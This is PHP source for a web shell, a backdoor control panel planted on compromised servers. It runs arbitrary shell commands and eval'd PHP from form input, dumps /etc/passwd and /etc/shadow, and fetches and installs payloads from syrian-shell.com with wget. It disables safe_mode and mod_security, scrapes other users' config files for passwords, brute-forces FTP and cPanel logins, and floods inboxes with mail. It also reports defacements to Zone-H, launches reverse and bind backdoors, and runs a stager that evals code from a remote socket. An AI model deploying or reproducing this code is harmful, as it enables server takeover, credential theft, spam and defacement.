- echo "<form method='post'><table width=100% border=1><tr><td>
- <textarea name='ExecutionArea' rows=10 cols=152 style='color=red'>";
- if(!$_POST || $_POST['login']) // Show Current Directory Contents if No Post in requesting ...
- {
- @chdir($_POST['directory']);
- if($os == "Windows")
- {
- echo Exe('dir');
- }
- else if($os == "Linux")
- {
- echo Exe('ls');
- }
- }
- else if($_POST['submitCommands']) // Execute The Alias Command .
- {
- echo Exe($_POST['alias']);
- }
- else if($_POST['Execute']) // Execute The Command From Command Line .
- {
- @chdir($_POST['directory']);
- if(empty($_POST['cmd']))
- {
- if($os == "Windows")
- {
- echo Exe('dir');
- }
- else if($os == "Linux")
- {
- echo Exe('ls -lia');
- }
- }
- else
- {
- echo Exe($_POST['cmd']);
- }
- }
- else if($_POST['submitEval']) // Execute Eval Code .
- {
- $eval = @str_replace("<?php","",$_POST['php_eval']);
- $eval = @str_replace("<?php","",$eval);
- $eval = @str_replace("?>","",$eval);
- $eval = @str_replace("\\","",$eval);
- echo eval($eval);
- }
- # --------------------------
- # Hash Analyzer
- #---------------------------
- else if($_POST['analyzieNow'])
- {
- $hash = $_POST['hashToAnalyze'];
- $subHash = substr($hash,0,3);
- if($subHash =='$ap' && strlen($hash) == 37)
- {
- echo "The Hash : ".$hash." is : MD5(APR) Hash";
- }
- else if($subHash =='$1$' && strlen($hash) == 34)
- {
- echo "The Hash : ".$hash." is : MD5(UNIX) Hash";
- }
- else if($subHash =='$H$' && strlen($hash) == 35)
- {
- echo "The Hash : ".$hash." is : MD5(phpBB3) Hash";
- }
- else if(strlen($hash) == 29)
- {
- echo "The Hash : ".$hash." is : MD5(Wordpress) Hash";
- }
- else if($subHash =='$5$' && strlen($hash) == 64)
- {
- echo "The Hash : ".$hash." is : SHA256(UNIX) Hash";
- }
- else if($subHash =='$6$' && strlen($hash) == 128)
- {
- echo "The Hash : ".$hash." is : SHA512(UNIX) Hash";
- }
- else if(strlen($hash) == 56)
- {
- echo "The Hash : ".$hash." is : SHA224 Hash";
- }
- else if(strlen($hash) == 64)
- {
- echo "The Hash : ".$hash." is : SHA256 Hash";
- }
- else if(strlen($hash) == 96)
- {
- echo "The Hash : ".$hash." is : SHA384 Hash";
- }
- else if(strlen($hash) == 128)
- {
- echo "The Hash : ".$hash." is : SHA512 Hash";
- }
- else if(strlen($hash) == 40)
- {
- echo "The Hash : ".$hash." is : MySQL v5.x Hash";
- }
- else if(strlen($hash) == 16)
- {
- echo "The Hash : ".$hash." is : MySQL Hash";
- }
- else if(strlen($hash) == 13)
- {
- echo "The Hash : ".$hash." is : DES(Unix) Hash";
- }
- else if(strlen($hash) == 32)
- {
- echo "The Hash : ".$hash." is : MD5 Hash";
- }
- else if(strlen($hash) == 4)
- {
- echo "The Hash : ".$hash." is : [CRC-16]-[CRC-16-CCITT]-[FCS-16]";}
- else
- {
- echo "Error : Can't Detect Hash Type";
- }
- }
- # --------------------------
- # Show Users
- #---------------------------
- else if($_POST['showUsers'])
- {
- function showUsers()
- {
- if($rows = Exe('cat /etc/passwd'))
- {
- echo $rows;
- }
- elseif($rows= Exe('cat /etc/domainalias'))
- {
- echo $rows;
- }
- elseif($rows= Exe('cat /etc/shadow'))
- {
- echo $rows;
- }
- elseif($rows= Exe('cat /var/mail'))
- {
- echo $rows;
- }
- elseif($rows= Exe('cat /etc/valiases'))
- {
- echo $rows;
- }
- else { echo "[-] Can't Show Users :( ... Sorry ";}
- }
- showUsers();
- }
- # --------------------------
- # Generate perl
- #---------------------------
- else if($_POST['generatePel'])
- {
- @chdir($_POST["cgiperlPath"]);
- @mkdir("cgi", 0755);
- @chdir("cgi");
- Exe('wget http://www.syrian-shell.com/cgiPerl/cgiPerl.sy3.zip');
- Exe('unzip cgiPerl.sy3.zip');
- @unlink('cgiPerl.sy3.zip');
- @chmod("cgiPerl.sy3",0755);
- @chmod("compiler",0777);
- $cgi_h = fopen('.htaccess','w+');
- @fwrite($cgi_h,'AddHandler cgi-script .sy3');
- echo '
- cgi.sy3 & .htaccess Has Been Created in [ cgi ] Directory
- Password Is : sy34' ;
- }
- # --------------------------
- # Generate Server
- #---------------------------
- else if($_POST['generateSER'])
- {
- @chdir($_POST['ShourtCutPath']);
- @mkdir("allserver", 0755);
- @chdir("allserver");
- Exe("ln -s / allserver");
- GenerateFile(".htaccess","
- Options Indexes FollowSymLinks
- DirectoryIndex ssssss.htm
- AddType txt .php
- AddHandler txt .php");
- echo 'Now Go to allserver folder '.$_POST['ShourtCutPath'].'' ;
- }
- # --------------------------
- # Change Mode
- #---------------------------
- else if($_POST['changePermission'])
- {
- $ch_ok = @chmod($_POST['fileName'],$_POST['per']);
- if($ch_ok)
- echo "Permission Changed Successfully ! " ;
- else echo "Changing Is Not Allowed Or The File is not Exist !";
- }
- # --------------------------
- # Generate Users
- #---------------------------
- else if($_POST['GenerateUsers'])
- {
- @chdir($_POST['usersPath']);
- @mkdir("users", 0755);
- @chdir('users');
- Exe('wget http://www.syrian-shell.com/usersAndDomains/users.rar');
- Exe('mv users.rar users.sy3');
- @chmod('users.sy3',0755 );
- $user_h = fopen('.htaccess','w+');
- fwrite($user_h,'AddHandler cgi-script .sy3');
- echo "users.sy3 & .htaccess Has Been Created in [ users ] Directory" ;
- }
- # --------------------------
- # Forbidden
- #---------------------------
- else if($_POST['generateForbidden'])
- {
- @chdir($_POST['forbiddenPath']);
- @mkdir('forbidden');
- @chdir('forbidden');
- $htaccess = fopen('.htaccess','w+');
- if($_POST['403'] == 'DirectoryIndex')
- {
- fwrite($htaccess,"DirectoryIndex in.txt");
- }
- elseif($_POST['403'] == 'HeaderName')
- {
- fwrite($htaccess,"HeaderName in.txt");
- }
- elseif($_POST['403'] == 'TXT')
- {
- fwrite($htaccess,"
- Options Indexes FollowSymLinks
- addType txt .php
- AddHandler txt .php");
- }
- elseif($_POST['403'] == '404')
- {
- fwrite($htaccess,"
- ErrorDocument 404 /404.html
- 404.html = Symlinked in.txt ");
- }
- elseif($_POST['403'] == 'ReadmeName')
- {
- fwrite($htaccess,"ReadmeName in.txt");
- }
- elseif($_POST['403'] == 'footerName')
- {
- fwrite($htaccess,"footerName in.txt");
- }
- echo "
- Now Go To [ forbidden ] Dir And Then make The Shortcut [ in.txt ]
- EX : ln -s /home/user/public_html/config.php in.txt";
- }
- # --------------------------
- # Upload Files
- #---------------------------
- else if($_POST['UploadNow'])
- {
- $nbr_uploaded =0;
- $files_uploded = array();
- $path= '';
- $target_path= $path . basename($_FILES['uploadfile']['name'][$i]);
- for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++)
- {
- if($_FILES['uploadfile']['name'][$i] != '')
- {
- move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $target_path . $_FILES['uploadfile']['name'][$i]);
- $files_uploded[] = $_FILES['uploadfile']['name'][$i];
- $nbr_uploaded++;
- echo "The File ".basename($_FILES['uploadfile']['name'][$i])." Uploaded Successfully !
- ";
- }
- else "The File ".basename($_FILES['uploadfile']['name'][$i])." Can't Be Upload :( !";
- }
- }
- # --------------------------
- # no Security
- #---------------------------
- else if($_POST['phpiniGenerate'])
- {
- GenerateFile("php.ini","
- safe_mode = Off
- disable_functions = NONE
- safe_mode_gid = OFF
- open_basedir = OFF");
- echo "php.ini Has Been Generated Successfully";
- }
- else if($_POST['htaccessGenerate'])
- {
- GenerateFile(".htaccess","
- <IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- SecFilterCheckURLEncoding Off
- SecFilterCheckCookieFormat Off
- SecFilterCheckUnicodeEncoding Off
- SecFilterNormalizeCookies Off
- </IfModule>
- SetEnv PHPRC ".getcwd()."php.ini
- suPHP_ConfigPath ".getcwd()."php.ini
- ");
- echo ".htaccess Has Been Generated Successfully ";
- }
- else if($_POST['iniphpGenerate'])
- {
- GenerateFile("ini.php","
- ini_restore(\"safe_mode\");
- ini_restore(\"open_basedir\");
- ");
- echo "ini.php Has Been Generated Successfully";
- }
- # --------------------------
- # Reading Files
- #---------------------------
- else if($_POST['read'] || $_POST['show'])
- {
- $file = $_POST['file'];
- $file = str_replace('\\\\','\\',$file);
- if($_POST['read'])
- {
- $openMyFile = fopen($file,'r');
- if(function_exists('fread'))
- {
- echo fread($openMyFile,100000);
- }
- elseif(function_exists('fgets'))
- {
- echo fgets($openMyFile);
- }
- elseif(function_exists('readfile'))
- {
- echo readfile($openMyFile);
- }
- elseif(function_exists('file_get_contents'))
- {
- $readMyFile = @file_get_contents($file, NULL, NULL, 0, 1000000);
- var_dump($readMyFile);
- }
- elseif(function_exists('file'))
- {
- $readMyFile = file($myFile);
- foreach ($readMyFile as $line_num => $readMyFileLine)
- {
- echo "Line #$line_num : " . $readMyFileLine . "
- ";
- }
- }
- elseif(Exe("'cat ".$file."'"))
- {
- echo Exe("'cat ".$file."'");
- }
- elseif(function_exists('readfile'))
- {
- readfile($file);
- }
- elseif(function_exists('include'))
- {
- include($file);
- }
- elseif(function_exists('copy'))
- {
- $tmp=tempnam('','cx');
- copy('compress.zlib://'.$file,$tmp);
- $fh=fopen($tmp,'r');
- $data=fread($fh,filesize($tmp));
- fclose($fh);
- echo $data;
- }
- elseif(function_exists('mb_send_mail'))
- {
- if(file_exists('/tmp/mb_send_mail'))
- {
- unlink('/tmp/mb_send_mail');
- }
- @mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');
- @readfile('/tmp/mb_send_mail');
- }
- else if(function_exists('curl_init'))
- {
- $fh=curl_init('file://'.$file.'');
- $tmp=curl_exec($fh);
- echo $tmp;
- if(strstr($file,DIRECTORY_SEPARATOR))
- $ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);
- else $ch=curl_init('file://'.$file."\x00".__FILE__);
- var_dump(curl_exec($ch));
- }
- else if(is_writable('.'))
- {
- file_put_contents('php.ini','safe_mode = Off');
- readfile($file);
- unlink('php.ini');
- }
- else if(is_object($ws=new COM('WScript.Shell')))
- {
- echo $exec=comshelL("type \"$file\"",$ws);
- }
- else if(checkfunctioN('win_shell_execute'))
- {
- echo winshelL("type \"$file\"");
- }
- else if(checkfunctioN('win32_create_service'))
- {
- echo srvshelL("type \"$file\"");
- }
- else if(function_exists('imap_open'))
- {
- $str=imap_open('/etc/passwd','','');
- $list=imap_list($str,$file,'*');
- for($i=0;$i<count($list);$i++)
- {
- echo $list[$i]."\n";
- }
- imap_close($str);
- $str=imap_open($file,'','');
- $tmp=imap_body($str,1);
- echo $tmp;
- imap_close($str);
- }
- elseif($file == '/etc/passwd')
- {
- for($uid=0;$uid<99999;$uid++)
- {
- $h=posix_getpwuid($uid);
- if(!empty($h))
- foreach($h as $v)
- echo "$v:";
- echo "\r\n";
- }
- }
- fclose($openMyFile);
- }
- elseif($_POST['show'])
- {
- $con=glob("$file*");
- foreach ($con as $v)
- {
- echo "$v\n";
- }
- if(function_exists('imap_open'))
- {
- $str=imap_open('/etc/passwd','','');
- $s=explode("|",$file);
- if(count($s)>1)
- {
- $list=imap_list($str,trim($s[0]),trim($s[1]));
- }
- else
- {
- $list=imap_list($str,trim($str[0]),'*');
- }
- for($i=0;$i<count($list);$i++)
- {
- imap_close($str);
- }
- }
- else if(is_object($ws=new COM('WScript.Shell')))
- {
- $exec=comshelL("dir \"$file\"",$ws);
- $exec=str_replace("\t",'',$exec);
- echo $exec;
- }
- else if(checkfunctioN('win_shell_execute'))
- {
- echo winshelL("dir \"$file\"");
- }
- else if(checkfunctioN('win32_create_service'))
- {
- echo srvshelL("dir \"$file\"");
- }
- }
- }
- # --------------------------
- # Encryption
- #---------------------------
- elseif($_POST['encryptNow'])
- {
- if(!empty($_POST['ENCRYPTION']))
- {
- $md5 = $_POST['ENCRYPTION'];
- echo "
- MD5 : ".md5($md5)."
- Base64 Encode : ".base64_encode($md5)."
- Base64 Decode : ".base64_decode($md5)."
- Crypt : ".crypt($md5)."
- SHA1 : ".sha1($md5)."
- MD4 : ".hash("md4",$md5)."
- SHA256 : ".hash("sha256",$md5)."
- URL Encoding : ".urlencode($md5)."
- URL Decoding : ".str_hex($md5)."
- CRC32 : ".crc32($md5)."
- Length : ".strlen($md5)."";
- }
- else
- {
- echo "Please Put At Least One Char !";
- }
- }
- # --------------------------
- # Metasploit RC
- #---------------------------
- else if($_POST['metaConnect'])
- {
- $ip = $_POST['ip'];
- $port = $_POST['port'];
- if ($ip == "" && $port == "")
- {
- echo "Please fill IP Adress & The listen Port";
- }
- else
- {
- $ipaddr = $ip;
- $port = $port;
- if (FALSE !== strpos($ipaddr, ":"))
- {
- $ipaddr = "[". $ipaddr ."]";
- }
- if (is_callable('stream_socket_client'))
- {
- $msgsock = @stream_socket_client("tcp://{$ipaddr}:{$port}");
- if (!$msgsock)
- {
- die();
- }
- $msgsock_type = 'stream';
- }
- elseif (is_callable('fsockopen'))
- {
- $msgsock = fsockopen($ipaddr,$port);
- if (!$msgsock)
- {
- die();
- }
- $msgsock_type = 'stream';
- }
- elseif (is_callable('socket_create'))
- {
- $msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
- $res = socket_connect($msgsock, $ipaddr, $port);
- if (!$res)
- {
- die();
- }
- $msgsock_type = 'socket';
- }
- else
- {
- die();
- }
- switch ($msgsock_type)
- {
- case 'stream': $len = fread($msgsock, 4); break;
- case 'socket': $len = socket_read($msgsock, 4); break;
- }
- if (!$len)
- {
- die();
- }
- $a = unpack("Nlen", $len);
- $len = $a['len'];
- $buffer = '';
- while (strlen($buffer) < $len)
- {
- switch ($msgsock_type)
- {
- case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer));
- break;
- case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));
- break;
- }
- }
- eval($buffer);
- echo "[*] Connection Terminated";
- die();
- }
- }
- # --------------------------
- # Scan Ports
- #---------------------------
- else if($_POST['submitDomainToScanPort'])
- {
- $domainToScan = $_POST['domainToScanPort'];
- if(!$domainToScan)
- {
- echo "[-] Enter IP Address Or Domain To Scan";
- }
- else
- {
- for($i=0;$i<1024;$i++)
- {
- $fp = @fsockopen($domainToScan,$i,$errno,$errstr,10);
- if($fp)
- {
- echo "[+] port " . $i . " open on " . $domainToScan . "
- ";
- }
- else
- {
- echo "[+] port " . $i . " closed on " . $domainToScan . "
- ";
- }
- flush();
- }
- fclose($fp);
- }
- }
- if (isset($_POST["submit_lol"]))
- {
- set_time_limit(0);
- $url = $_POST['hash_lol'];
- echo "Testing ".$url."\n";
- $extention = $_POST['extention'];
- $adminlocales = array(
- "admin/",
- "wp-admin/",
- "administration/",
- "administrator/",
- "moderator/",
- "webadmin/",
- "adminarea/",
- "bb-admin/",
- "adminLogin/",
- "admin_area/",
- "panel-administracion/",
- "instadmin/",
- "memberadmin/",
- "administratorlogin/",
- "adm/",
- "siteadmin/login".$extention."",
- "admin/account".$extention."",
- "admin/index".$extention."",
- "admin/login".$extention."",
- "admin/admin".$extention."",
- "admin_area/login".$extention."",
- "admin_area/index".$extention."",
- "admincp/index".$extention."",
- "adminpanel".$extention."",
- "webadmin".$extention."",
- "webadmin/index".$extention."",
- "webadmin/login".$extention."",
- "admin/admin_login".$extention."",
- "admin_login".$extention."",
- "panel-administracion/login".$extention."",
- "admin_area/admin".$extention."",
- "bb-admin/index".$extention."",
- "bb-admin/login".$extention."",
- "bb-admin/admin".$extention."",
- "admin/home".$extention."",
- "pages/admin/admin-login".$extention."",
- "admin/admin-login".$extention."",
- "admin-login".$extention."",
- "admin/adminLogin".$extention."",
- "home".$extention."",
- "adminarea/index".$extention."",
- "admin/controlpanel".$extention."",
- "admin".$extention."",
- "admin/cp".$extention."",
- "cp".$extention."",
- "adminpanel.php",
- "moderator".$extention."",
- "administrator/index".$extention."",
- "administrator/login".$extention."",
- "user".$extention."",
- "administrator/account".$extention."",
- "administrator".$extention."",
- "login".$extention."",
- "modelsearch/login".$extention."",
- "moderator/login".$extention."",
- "panel-administracion/admin".$extention."",
- "admincontrol/login".$extention."",
- "adm/index".$extention."",
- "moderator/admin".$extention."",
- "account".$extention."",
- "controlpanel".$extention."",
- "admincontrol".$extention."",
- "webadmin/admin".$extention."",
- "adminLogin".$extention."",
- "panel-administracion/login".$extention."",
- "wp-login".$extention."",
- "adminLogin".$extention."",
- "admin/adminLogin".$extention."",
- "adminarea/index".$extention."",
- "adminarea/admin".$extention."",
- "adminarea/login".$extention."",
- "panel-administracion/index".$extention."",
- "modelsearch/index".$extention."",
- "modelsearch/admin".$extention."",
- "adm/admloginuser".$extention."",
- "admloginuser".$extention."",
- "admin2".$extention."",
- "admin2/login".$extention."",
- "admin2/index".$extention."",
- "adm/index".$extention."",
- "adm".$extention."",
- "affiliate".$extention."",
- "adm_auth".$extention."",
- "memberadmin".$extention."",
- "administratorlogin".$extention."");
- foreach ($adminlocales as $admin)
- {
- $headers = @get_headers("$url$admin");
- if (@eregi('200', $headers[0]))
- {
- echo "[+] $url$admin ~ Found!\n";
- }
- }
- }
- # --------------------------
- # Config Finder
- #---------------------------
- else if($_POST['configFinderSubmit'])
- {
- set_time_limit(0);
- $passwd=fopen('/etc/passwd','r');
- if (!$passwd)
- {
- echo "[-] Error : coudn't read /etc/passwd";
- exit;
- }
- $path_to_public=array();
- $users=array();
- $pathtoconf=array();
- $i=0;
- while(!feof($passwd))
- {
- $str=fgets($passwd);
- if ($i>35)
- {
- $pos=strpos($str,":");
- $username=substr($str,0,$pos);
- $dirz="/home/$username/public_html/";
- if (($username!=""))
- {
- if (is_readable($dirz))
- {
- array_push($users,$username);
- array_push($path_to_public,$dirz);
- }
- }
- }
- $i++;
- }
- echo "";
- echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd
- ";
- echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories
- ";
- echo "[~] Searching for passwords in config.* files...
- ";
- foreach ($users as $user)
- {
- $path="/home/$user/public_html/";
- read_dir($path,$user);
- }
- echo "[+] Done";
- }
- # --------------------------
- # Mail Storm
- #---------------------------
- else if($_POST['sendMailStorm'])
- {
- $to=$_POST['to'];
- $nom=$_POST['nom'];
- $Comments=$_POST['Comments'];
- if ($to <> "" )
- {
- for ($i = 0; $i < $nom ; $i++)
- {
- $from = rand (71,1020000000)."@"."Attacker.com";
- $subject= md5("$from");
- if(@mail($to,$subject,$Comments,"From:$from"))
- echo "[+] $i spammed !!
- ";
- else
- {
- echo "[-] $i Failed !!
- ";
- }
- }
- }
- }
- # --------------------------
- # Extract Emails
- #---------------------------
- else if($_POST['getEmails'])
- {
- $emhost = $_POST['EM_HOST'];
- $emuser = $_POST['EM_USER'];
- $empass = $_POST['EM_PASS'];
- $emdb = $_POST['EM_DB'];
- $emtab = $_POST['EM_TABLE'];
- $emcol = $_POST['EM_COLUMN'];
- $try2Connect = @mysql_connect($emhost,$emuser,$empass);
- if(!$try2Connect)
- {
- echo "[-] Can't Connect To DB !! [ user name || password is wrong ! ] .
- ";
- }
- $try2Select = @mysql_select_db($emdb);
- if(!$try2Select && $try2Connect)
- {
- echo "[-] DB Name is Wrong !! . ";
- }
- $sql = @mysql_query("SELECT * FROM $emtab");
- while ($res = @mysql_fetch_array($sql))
- {
- echo ''.$res["$emcol"].'
- ';
- }
- }
- // Help
- else if($_POST['emailExtractorHelp'])
- {
- echo "This is Some Tables Name & Columns Name For Some Fam Scripts ..
- [+] VBulletin
- Table-name : user
- column-name : email
- [+] WordPress
- Table-name : wp_users
- column-name : user_email
- [+] Joomla
- Table-name : jos_users
- column-name : email
- [+] PHPBB
- Table-name : phpbb_users
- column-name : user_email
- [+] I.P.Board
- Table-name : ibf_members
- column-name : email
- [+] SMF
- Table-name : smf_members
- column-name : emailAddress ";
- }
- # --------------------------
- # MySQL Query
- #---------------------------
- else if($_POST['MySQLQuery'])
- {
- $qu_host =$_POST['QU_HOST'];
- $qu_user =$_POST['QU_USER'];
- $qu_pass =$_POST['QU_PASS'];
- $qu_db =$_POST['QU_DB'];
- $query =$_POST['QU'];
- if (empty($_POST['QU_HOST']))
- $qu_host = 'localhost';
- $query = str_replace("\\","",$query);
- if (!empty($_POST['QU']))
- {
- $tryConnection = @mysql_connect($qu_host,$qu_user,$qu_pass);
- if(!$tryConnection)
- {
- echo "[-] Unable TO Connect DATABASE ! Username Or Password Is Wrong !!";
- }
- else
- {
- $selectDB = @mysql_select_db($qu_db);
- if(!$selectDB)
- {
- echo "[-] Database Name Is Wrong !!";
- }
- else
- {
- $qqok1 = mysql_query($query);
- if(!$qqok1)
- {
- echo "[-] Can't Execute The Query";
- }
- }
- }
- @mysql_close();
- }
- if ($qqok1)
- {
- update();
- }
- }
- # --------------------------
- # SQL Reader
- #---------------------------
- else if ($_POST['sql2Read'])
- {
- $host = $_POST['host'];
- $user = $_POST['user'];
- $pass = $_POST['pass'];
- $db = $_POST['db'];
- $unique = uniqid('N');
- $file = $_POST['file'];
- $file = str_replace('\\\\','\\',$file);
- $query = array(
- "CREATE TEMPORARY TABLE $unique (file LONGBLOB)",
- "LOAD DATA INFILE '".mysql_real_escape_string($file)."' INTO TABLE $unique",
- "SELECT * FROM $unique"
- );
- $connect = mysql_connect($host,$user, $pass);
- mysql_select_db($db,$connect);
- foreach($query as $Allqueries)
- {
- $mysqlQuery = mysql_query($Allqueries,$connect);
- while($line = @mysql_fetch_row($mysqlQuery))
- echo htmlspecialchars($line[0]);
- echo "\n";
- }
- }
- # --------------------------
- # Edit File
- #---------------------------
- else if($_POST['editFileSubmit'])
- {
- $file2Edit = $_POST['editFile'];
- echo @file_get_contents($file2Edit);
- }
- else if($_POST['saveEditedFile'])
- {
- $fileName = $_POST['file2edit'];
- $newFile = $_POST['ExecutionArea'];
- $trytoGenerate = GenerateFile($fileName,$newFile);
- if($trytoGenerate)
- {
- echo "[+] File Saved !";
- }
- else
- {
- echo "[-] Failed To Save File !!";
- }
- }
- # --------------------------
- # Zone H Attacker
- #---------------------------
- else if($_POST['SendNowToZoneH'])
- {
- ob_start();
- $sub = @get_loaded_extensions();
- if(!in_array("curl", $sub))
- {
- die('[-] Curl Is Not Supported !! ');
- }
- $hacker = $_POST['defacer'];
- $method = $_POST['hackmode'];
- $neden = $_POST['reason'];
- $site = $_POST['domain'];
- if (empty($hacker))
- {
- die ("[-] You Must Fill the Attacker name !");
- }
- elseif($method == "--------SELECT--------")
- {
- die("[-] You Must Select The Method !");
- }
- elseif($neden == "--------SELECT--------")
- {
- die("[-] You Must Select The Reason");
- }
- elseif(empty($site))
- {
- die("[-] You Must Inter the Sites List ! ");
- }
- $i = 0;
- $sites = explode("\n", $site);
- while($i < count($sites))
- {
- if(substr($sites[$i], 0, 4) != "http")
- {
- $sites[$i] = "http://".$sites[$i];
- }
- ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
- echo "Site : ".$sites[$i]." Defaced !\n";
- ++$i;
- }
- echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
- }
- # --------------------------
- # FTP And Cpanle Brute Force Attacker
- #---------------------------
- else if($_POST['BruteForceCpanelAndFTP'])
- {
- $connect_timeout=5;
- set_time_limit(0);
- $submit=$_REQUEST['BruteForceCpanelAndFTP'];
- $users=$_REQUEST['users'];
- $pass=$_REQUEST['passwords'];
- $target=$_REQUEST['target'];
- $cracktype=$_REQUEST['cracktype'];
- if(empty($target))
- {
- $target = "localhost";
- }
- function ftp_check($host,$user,$pass,$timeout)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "ftp://$host");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
- curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
- curl_setopt($ch, CURLOPT_FAILONERROR, 1);
- $data = curl_exec($ch);
- if ( curl_errno($ch) == 28 )
- {
- print "Error : Connection Timeout Please Check The Target Hostname .";
- exit;
- }
- elseif ( curl_errno($ch) == 0 )
- {
- print "[+] Cracking Success With Username ($user) and Password ($pass)";
- }
- curl_close($ch);
- }
- function cpanel_check($host,$user,$pass,$timeout)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
- curl_setopt($ch, CURLOPT_FAILONERROR, 1);
- $data = curl_exec($ch);
- if ( curl_errno($ch) == 28 )
- {
- print "[-] Connection Timeout Please Check The Target Hostname .";
- exit;
- }
- elseif ( curl_errno($ch) == 0 )
- {
- print "[+] Cracking Success With Username ($user) and Password ($pass)";
- }
- curl_close($ch);
- }
- if(isset($submit) && !empty($submit))
- {
- if(empty($users) && empty($pass))
- {
- print "[-] Please Check The Users or Password List Entry . . .";
- }
- if(empty($users))
- {
- print "[-] Please Check The Users List Entry . . .";
- }
- if(empty($pass))
- {
- print "[-] Please Check The Password List Entry . . ";
- }
- $userlist=explode("\n",$users);
- $passlist=explode("\n",$pass);
- print "[~]# Cracking Process Started, Please Wait ...";
- foreach ($userlist as $user)
- {
- $pureuser = trim($user);
- foreach ($passlist as $password )
- {
- $purepass = trim($password);
- if($cracktype == "ftp")
- {
- ftp_check($target,$pureuser,$purepass,$connect_timeout);
- }
- if ($cracktype == "cpanel")
- {
- cpanel_check($target,$pureuser,$purepass,$connect_timeout);
- }
- }
- }
- }
- }
- # --------------------------
- # Back Connection
- #---------------------------
- else if($_POST['backconn'])
- {
- if (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
- {
- $ip = trim($_POST['ip']);
- $port = trim($_POST['backport']);
- tulis("bcc.c",$back_connect_c);
- Exe('gcc -o bcc bcc.c');
- Exe('chmod 777 bcc');
- @unlink('bcc.c');
- Exe("./bcc ".$ip." ".$port." &");
- $msg = "Now script try connect to ".$ip." port ".$port." ...";
- }
- elseif (!empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
- {
- $ip = trim($_POST['ip']);
- $port = trim($_POST['backport']);
- tulis("bcp",$back_connect);
- Exe("chmod +x bcp");
- $p2=which("perl");
- Exe($p2." bcp ".$ip." ".$port." &");
- $msg = "Now script try connect to ".$ip." port ".$port." ...";
- }
- }
- # --------------------------
- # Bind Connection
- #---------------------------
- else if($_POST['bind'])
- {
- if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
- {
- $port = trim($_POST['port']);
- $passwrd = trim($_POST['bind_pass']);
- tulis("bdc.c",$port_bind_bd_c);
- Exe('gcc -o bdc bdc.c');
- Exe('chmod 777 bdc');
- @unlink("bdc.c");
- Exe("./bdc ".$port." ".$passwrd." &");
- $scan = Exe("ps aux");
- if(eregi("./bdc $por",$scan))
- {
- $msg = "Process found running, backdoor setup successfully.";
- }
- else
- {
- $msg = "Process not found running, backdoor not setup successfully.";
- }
- }
- elseif (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
- {
- $port = trim($_POST['port']);
- $passwrd = trim($_POST['bind_pass']);
- tulis("bdp",$port_bind_bd_pl);
- Exe("chmod 777 bdp");
- $p2=which("perl");
- Exe($p2." bdp ".$port." &");
- $scan = Exe("ps aux");
- if(eregi("$p2 bdp $port",$scan))
- {
- $msg = "Process found running, backdoor setup successfully.";
- }
- else
- {
- $msg = "Process not found running, backdoor not setup successfully.";
- }
- }
- }
- echo "</textarea>";
- if($_POST['editFileSubmit'])
- {
- echo "<input type='hidden' value='".$_POST['editFile']."' name='file2edit' /> ";
- echo "<input type='submit' value='Save' name='saveEditedFile'>";
- }
- echo "</form>
- <!-- Main Table -->
- <table width='100%'><tr>
- <td width='30%' height=30>
- <!-- End Of Main Table -->
- <!-- Commands Alias-->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Commands Alias </td></tr><tr><td height='45' colspan='2'>";SelectCommand($os); echo "<input
- name='submitCommands' type='submit' value='ExecuteCommand'></td></tr></table></form>
- <!-- End Of Commands Alias-->
- </td>
- <td width='30%' height=30>
- <!-- Command Line -->
- <form method='POST'>
- <table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Command Line </td></tr><tr><td height='45' colspan='2'>
- <input type='text' name='cmd' id='commandLine' value='dir' size=59>
- <input type='text' name='directory' value=".getcwd()." size=59>
- <input name='Execute' id='Execute' type='submit' value='Execute' >
- </td></tr></table></form>
- <!-- End Of Command Line -->
- </td>
- <td width='30%' height=30>
- <!-- Edit File -->
- <form method=POST>
- <table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Edit File </td></tr><tr><td height='45' colspan='2'>
- <input type='text' name='editFile' size=59>
- <input name='editFileSubmit' type='submit' value='Edit'>
- </td></tr></table></form>
- <!-- End Of Edit File -->
- </td>
- </tr>
- <tr>
- <td width='30%'>
- <!-- Chmod Force -->
- <form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
- <td width='12' height='21' style='background-color:".$shellColor."'> </td>
- <td style='background-color:#666;padding-left:10px;'>Change Mode </td></tr><tr><td height='45' colspan='2'>
- <input type='text' name='fileName' value='index.php' size=48>
- <br/><input type='text' name='per' value='0644' size='10'>
- <input type=submit value='Change Now !' name='changePermission'>
